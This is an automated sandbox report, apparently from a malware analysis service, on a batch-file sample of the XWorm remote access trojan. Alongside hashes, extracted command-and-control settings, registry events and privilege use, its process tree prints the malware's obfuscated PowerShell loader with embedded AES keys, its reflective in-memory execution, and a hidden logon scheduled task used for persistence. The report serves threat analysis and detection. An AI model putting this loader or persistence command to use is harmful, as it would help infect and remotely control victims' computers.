xworm | 888b6ce9498a1425df0701fdc73c99c255684ec192db6290e16bb4c82da8656e

Analysis

max time kernel
493s
max time network
489s
platform
windows11-21h2_x64
resource
win11-20240508-en
resource tags

arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system
submitted
15-06-2024 18:23

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

binded.bat
Size

1.1MB
MD5

4fcc4a79a40b5d4eda4116d6296dc607
SHA1

4f140172d00f5a40eb9c0f07b166cfc2111f0d71
SHA256

888b6ce9498a1425df0701fdc73c99c255684ec192db6290e16bb4c82da8656e
SHA512

2614afb3e2f7f5501246d79c7871710d0048ebacc69e517766709fdcb56e858c27deb4ed0fe1eab46f8175033446fb2f720fb43ff161552986d31dd4a8e0ccc1
SSDEEP

24576:vVq7sFq6XgPKd2wM6RcN9vz4vO21SCKesDu8a1KZ/4hvXQ:vxlR6QBsxb/4C

Score

10^/10

xworm execution rat trojan

Malware Config

Extracted

Family

xworm

Version

5.0

37.114.46.114:5555

Mutex

ybJkzY88U2SuCjEV

Attributes

install_file
USB.exe

aes.plain

Signatures

Detect Xworm Payload 1 IoCs

resource	yara_rule
behavioral2/memory/3284-185-0x0000020E7EFD0000-0x0000020E7EFDE000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm

Blocklisted process makes network request 17 IoCs

flow	pid	Process
1	3284	powershell.exe
2	3284	powershell.exe
6	3284	powershell.exe
7	3284	powershell.exe
8	3284	powershell.exe
13	3284	powershell.exe
15	3284	powershell.exe
17	3284	powershell.exe
19	3284	powershell.exe
20	3284	powershell.exe
21	3284	powershell.exe
23	3284	powershell.exe
24	3284	powershell.exe
27	3284	powershell.exe
29	3284	powershell.exe
30	3284	powershell.exe
33	3284	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
1660	powershell.exe
3284	powershell.exe
4864	powershell.exe
1496	powershell.exe
4644	powershell.exe
2672	powershell.exe
3188	powershell.exe
2440	powershell.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\$rundll_424_str	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-CloudStore%4Operational.evtx	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies data under HKEY_USERS 7 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9a-89-91-53-4f-d9	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9a-89-91-53-4f-d9\WpadDecisionReason = "1"	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9a-89-91-53-4f-d9\WpadDecisionTime = 51f08a7a52bfda01	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9a-89-91-53-4f-d9\WpadDecision = "0"	svchost.exe
Set value (data)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\9a-89-91-53-4f-d9\WpadDecisionTime = 184d6dce52bfda01	svchost.exe

Modifies registry class 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1672260578-815027929-964132517-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2672	powershell.exe
2672	powershell.exe
4980	powershell.exe
4980	powershell.exe
3188	powershell.exe
3188	powershell.exe
2440	powershell.exe
2440	powershell.exe
1660	powershell.exe
1660	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
4864	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
4864	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe
1496	powershell.exe
1496	powershell.exe
1496	powershell.exe
3284	powershell.exe
3284	powershell.exe
3284	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2672	powershell.exe
Token: SeDebugPrivilege	4980	powershell.exe
Token: SeDebugPrivilege	3188	powershell.exe
Token: SeDebugPrivilege	2440	powershell.exe
Token: SeDebugPrivilege	1660	powershell.exe
Token: SeIncreaseQuotaPrivilege	1660	powershell.exe
Token: SeSecurityPrivilege	1660	powershell.exe
Token: SeTakeOwnershipPrivilege	1660	powershell.exe
Token: SeLoadDriverPrivilege	1660	powershell.exe
Token: SeSystemProfilePrivilege	1660	powershell.exe
Token: SeSystemtimePrivilege	1660	powershell.exe
Token: SeProfSingleProcessPrivilege	1660	powershell.exe
Token: SeIncBasePriorityPrivilege	1660	powershell.exe
Token: SeCreatePagefilePrivilege	1660	powershell.exe
Token: SeBackupPrivilege	1660	powershell.exe
Token: SeRestorePrivilege	1660	powershell.exe
Token: SeShutdownPrivilege	1660	powershell.exe
Token: SeDebugPrivilege	1660	powershell.exe
Token: SeSystemEnvironmentPrivilege	1660	powershell.exe
Token: SeRemoteShutdownPrivilege	1660	powershell.exe
Token: SeUndockPrivilege	1660	powershell.exe
Token: SeManageVolumePrivilege	1660	powershell.exe
Token: 33	1660	powershell.exe
Token: 34	1660	powershell.exe
Token: 35	1660	powershell.exe
Token: 36	1660	powershell.exe
Token: SeIncreaseQuotaPrivilege	1660	powershell.exe
Token: SeSecurityPrivilege	1660	powershell.exe
Token: SeTakeOwnershipPrivilege	1660	powershell.exe
Token: SeLoadDriverPrivilege	1660	powershell.exe
Token: SeSystemProfilePrivilege	1660	powershell.exe
Token: SeSystemtimePrivilege	1660	powershell.exe
Token: SeProfSingleProcessPrivilege	1660	powershell.exe
Token: SeIncBasePriorityPrivilege	1660	powershell.exe
Token: SeCreatePagefilePrivilege	1660	powershell.exe
Token: SeBackupPrivilege	1660	powershell.exe
Token: SeRestorePrivilege	1660	powershell.exe
Token: SeShutdownPrivilege	1660	powershell.exe
Token: SeDebugPrivilege	1660	powershell.exe
Token: SeSystemEnvironmentPrivilege	1660	powershell.exe
Token: SeRemoteShutdownPrivilege	1660	powershell.exe
Token: SeUndockPrivilege	1660	powershell.exe
Token: SeManageVolumePrivilege	1660	powershell.exe
Token: 33	1660	powershell.exe
Token: 34	1660	powershell.exe
Token: 35	1660	powershell.exe
Token: 36	1660	powershell.exe
Token: SeIncreaseQuotaPrivilege	1660	powershell.exe
Token: SeSecurityPrivilege	1660	powershell.exe
Token: SeTakeOwnershipPrivilege	1660	powershell.exe
Token: SeLoadDriverPrivilege	1660	powershell.exe
Token: SeSystemProfilePrivilege	1660	powershell.exe
Token: SeSystemtimePrivilege	1660	powershell.exe
Token: SeProfSingleProcessPrivilege	1660	powershell.exe
Token: SeIncBasePriorityPrivilege	1660	powershell.exe
Token: SeCreatePagefilePrivilege	1660	powershell.exe
Token: SeBackupPrivilege	1660	powershell.exe
Token: SeRestorePrivilege	1660	powershell.exe
Token: SeShutdownPrivilege	1660	powershell.exe
Token: SeDebugPrivilege	1660	powershell.exe
Token: SeSystemEnvironmentPrivilege	1660	powershell.exe
Token: SeRemoteShutdownPrivilege	1660	powershell.exe
Token: SeUndockPrivilege	1660	powershell.exe
Token: SeManageVolumePrivilege	1660	powershell.exe

Suspicious use of FindShellTrayWindow 3 IoCs

pid	Process
3200	Explorer.EXE
3200	Explorer.EXE
3200	Explorer.EXE

Suspicious use of SendNotifyMessage 3 IoCs

pid	Process
3200	Explorer.EXE
3200	Explorer.EXE
3200	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4876 wrote to memory of 760	4876	cmd.exe	78
PID 4876 wrote to memory of 760	4876	cmd.exe	78
PID 4876 wrote to memory of 2672	4876	cmd.exe	79
PID 4876 wrote to memory of 2672	4876	cmd.exe	79
PID 2672 wrote to memory of 4980	2672	powershell.exe	81
PID 2672 wrote to memory of 4980	2672	powershell.exe	81
PID 4980 wrote to memory of 1076	4980	powershell.exe	83
PID 4980 wrote to memory of 1076	4980	powershell.exe	83
PID 1076 wrote to memory of 1160	1076	cmd.exe	84
PID 1076 wrote to memory of 1160	1076	cmd.exe	84
PID 1076 wrote to memory of 3188	1076	cmd.exe	85
PID 1076 wrote to memory of 3188	1076	cmd.exe	85
PID 1620 wrote to memory of 1796	1620	cmd.exe	91
PID 1620 wrote to memory of 1796	1620	cmd.exe	91
PID 1620 wrote to memory of 2440	1620	cmd.exe	92
PID 1620 wrote to memory of 2440	1620	cmd.exe	92
PID 2440 wrote to memory of 1660	2440	powershell.exe	93
PID 2440 wrote to memory of 1660	2440	powershell.exe	93
PID 2440 wrote to memory of 3716	2440	powershell.exe	95
PID 2440 wrote to memory of 3716	2440	powershell.exe	95
PID 3716 wrote to memory of 2400	3716	WScript.exe	96
PID 3716 wrote to memory of 2400	3716	WScript.exe	96
PID 2400 wrote to memory of 2412	2400	cmd.exe	98
PID 2400 wrote to memory of 2412	2400	cmd.exe	98
PID 2400 wrote to memory of 3284	2400	cmd.exe	99
PID 2400 wrote to memory of 3284	2400	cmd.exe	99
PID 3284 wrote to memory of 3200	3284	powershell.exe	52
PID 3284 wrote to memory of 2844	3284	powershell.exe	50
PID 3284 wrote to memory of 1560	3284	powershell.exe	25
PID 3284 wrote to memory of 1752	3284	powershell.exe	29
PID 3284 wrote to memory of 1948	3284	powershell.exe	32
PID 3284 wrote to memory of 3720	3284	powershell.exe	73
PID 3284 wrote to memory of 1352	3284	powershell.exe	23
PID 3284 wrote to memory of 1744	3284	powershell.exe	35
PID 3284 wrote to memory of 3376	3284	powershell.exe	53
PID 3284 wrote to memory of 2520	3284	powershell.exe	43
PID 3284 wrote to memory of 1132	3284	powershell.exe	19
PID 3284 wrote to memory of 932	3284	powershell.exe	11
PID 3284 wrote to memory of 1124	3284	powershell.exe	18
PID 3284 wrote to memory of 2692	3284	powershell.exe	48
PID 3284 wrote to memory of 2096	3284	powershell.exe	88
PID 3284 wrote to memory of 3956	3284	powershell.exe	58
PID 3284 wrote to memory of 1108	3284	powershell.exe	17
PID 3284 wrote to memory of 1600	3284	powershell.exe	26
PID 3284 wrote to memory of 2484	3284	powershell.exe	42
PID 3284 wrote to memory of 2680	3284	powershell.exe	47
PID 3284 wrote to memory of 3404	3284	powershell.exe	54
PID 3284 wrote to memory of 2284	3284	powershell.exe	39
PID 3284 wrote to memory of 1296	3284	powershell.exe	22
PID 3284 wrote to memory of 2476	3284	powershell.exe	41
PID 3284 wrote to memory of 1288	3284	powershell.exe	69
PID 3284 wrote to memory of 2664	3284	powershell.exe	46
PID 3284 wrote to memory of 1084	3284	powershell.exe	16
PID 3284 wrote to memory of 2056	3284	powershell.exe	36
PID 3284 wrote to memory of 708	3284	powershell.exe	14
PID 3284 wrote to memory of 4612	3284	powershell.exe	64
PID 3284 wrote to memory of 1652	3284	powershell.exe	28
PID 3284 wrote to memory of 2532	3284	powershell.exe	72
PID 3284 wrote to memory of 1252	3284	powershell.exe	21
PID 3284 wrote to memory of 948	3284	powershell.exe	65
PID 3284 wrote to memory of 2032	3284	powershell.exe	34
PID 3284 wrote to memory of 1636	3284	powershell.exe	27
PID 3284 wrote to memory of 1436	3284	powershell.exe	24
PID 3284 wrote to memory of 1040	3284	powershell.exe	15

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
1⤵
PID:820
- C:\Windows\system32\DllHost.exe
  C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}
  2⤵
  PID:2124
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\svchost.bat" "
    3⤵
    PID:3356
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0r+0kyFBt0CB4/hGdDqpXDDHp0ZFdJ2yISJo1fJ42Xw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('b2eU97tnvMxgKqltgo/SJg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $keVus=New-Object System.IO.MemoryStream(,$param_var); $mUyJN=New-Object System.IO.MemoryStream; $kYZlL=New-Object System.IO.Compression.GZipStream($keVus, [IO.Compression.CompressionMode]::Decompress); $kYZlL.CopyTo($mUyJN); $kYZlL.Dispose(); $keVus.Dispose(); $mUyJN.Dispose(); $mUyJN.ToArray();}function execute_function($param_var,$param2_var){ $uJZpt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mEYQo=$uJZpt.EntryPoint; $mEYQo.Invoke($null, $param2_var);}$HNCvy = 'C:\Users\Admin\AppData\Local\svchost.bat';$host.UI.RawUI.WindowTitle = $HNCvy;$rjaMb=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HNCvy).Split([Environment]::NewLine);foreach ($ddjCn in $rjaMb) { if ($ddjCn.StartsWith('EyTFRVkAWjarRNfpfcEu')) { $trlof=$ddjCn.Substring(20); break; }}$payloads_var=[string[]]$trlof.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      4⤵
      PID:3288
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
      4⤵
      Command and Scripting Interpreter: PowerShell
      Modifies registry class
      Suspicious behavior: EnumeratesProcesses
      PID:4864
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$rundll_424_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$svchost_424.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:1496
    - - C:\Windows\System32\WScript.exe
        
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$svchost_424.vbs"
        5⤵
        
        PID:1068
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$svchost_424.bat" "
        6⤵
        
        PID:2788
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('0r+0kyFBt0CB4/hGdDqpXDDHp0ZFdJ2yISJo1fJ42Xw='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('b2eU97tnvMxgKqltgo/SJg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $keVus=New-Object System.IO.MemoryStream(,$param_var); $mUyJN=New-Object System.IO.MemoryStream; $kYZlL=New-Object System.IO.Compression.GZipStream($keVus, [IO.Compression.CompressionMode]::Decompress); $kYZlL.CopyTo($mUyJN); $kYZlL.Dispose(); $keVus.Dispose(); $mUyJN.Dispose(); $mUyJN.ToArray();}function execute_function($param_var,$param2_var){ $uJZpt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $mEYQo=$uJZpt.EntryPoint; $mEYQo.Invoke($null, $param2_var);}$HNCvy = 'C:\Users\Admin\AppData\Roaming\$svchost_424.bat';$host.UI.RawUI.WindowTitle = $HNCvy;$rjaMb=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HNCvy).Split([Environment]::NewLine);foreach ($ddjCn in $rjaMb) { if ($ddjCn.StartsWith('EyTFRVkAWjarRNfpfcEu')) { $trlof=$ddjCn.Substring(20); break; }}$payloads_var=[string[]]$trlof.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        7⤵
        
        PID:1552
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
1⤵
PID:932

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:992

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:708

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:1040

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1⤵
PID:1084

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1108

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1124

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1132

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1196

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
1⤵
PID:1252

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1296

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1352

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1436

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
- Drops file in System32 directory
PID:1560

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:1600

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1636

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1652

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1752

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1808

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1816

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1948

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2024

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2032

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:1744

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:2056

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
1⤵
PID:2196

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2284

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2364

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2476

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p
1⤵
PID:2520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2588

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2664

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2680

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2844

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3200
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\binded.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ubDdfc++dGnZOierWx4nOy1eVZcVDN85yhJABtnz1EQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('gCMQkn589+ljXLannfa+nQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $RIlPD=New-Object System.IO.MemoryStream(,$param_var); $OGgVf=New-Object System.IO.MemoryStream; $eubOA=New-Object System.IO.Compression.GZipStream($RIlPD, [IO.Compression.CompressionMode]::Decompress); $eubOA.CopyTo($OGgVf); $eubOA.Dispose(); $RIlPD.Dispose(); $OGgVf.Dispose(); $OGgVf.ToArray();}function execute_function($param_var,$param2_var){ $QwKrI=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $WoDJg=$QwKrI.EntryPoint; $WoDJg.Invoke($null, $param2_var);}$JMcWp = 'C:\Users\Admin\AppData\Local\Temp\binded.bat';$host.UI.RawUI.WindowTitle = $JMcWp;$AmLgz=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($JMcWp).Split([Environment]::NewLine);foreach ($SNfpD in $AmLgz) { if ($SNfpD.StartsWith('pMkqFCQhZNmuDPfTbxXO')) { $BtghH=$SNfpD.Substring(20); break; }}$payloads_var=[string[]]$BtghH.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:760
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2672
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\Users\Admin\AppData\Local\dllhost.bat
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4980
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\dllhost.bat""
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:1076
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('z2xC2h+C2t+xhefZVNgrwhVd+6cW81hKA09gr+Vgl4k='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uJXvi7Nv9XV1R1jEsJpl9g=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $FYNnG=New-Object System.IO.MemoryStream(,$param_var); $ddxMX=New-Object System.IO.MemoryStream; $tCHGY=New-Object System.IO.Compression.GZipStream($FYNnG, [IO.Compression.CompressionMode]::Decompress); $tCHGY.CopyTo($ddxMX); $tCHGY.Dispose(); $FYNnG.Dispose(); $ddxMX.Dispose(); $ddxMX.ToArray();}function execute_function($param_var,$param2_var){ $FpgFt=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $IsQVI=$FpgFt.EntryPoint; $IsQVI.Invoke($null, $param2_var);}$gzWXE = 'C:\Users\Admin\AppData\Local\dllhost.bat';$host.UI.RawUI.WindowTitle = $gzWXE;$jVKyS=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($gzWXE).Split([Environment]::NewLine);foreach ($MYFti in $jVKyS) { if ($MYFti.StartsWith('mDQBKkDMpSmzSJjqvWce')) { $zEoKi=$MYFti.Substring(20); break; }}$payloads_var=[string[]]$zEoKi.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        6⤵
        
        PID:1160
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3188

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3376

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
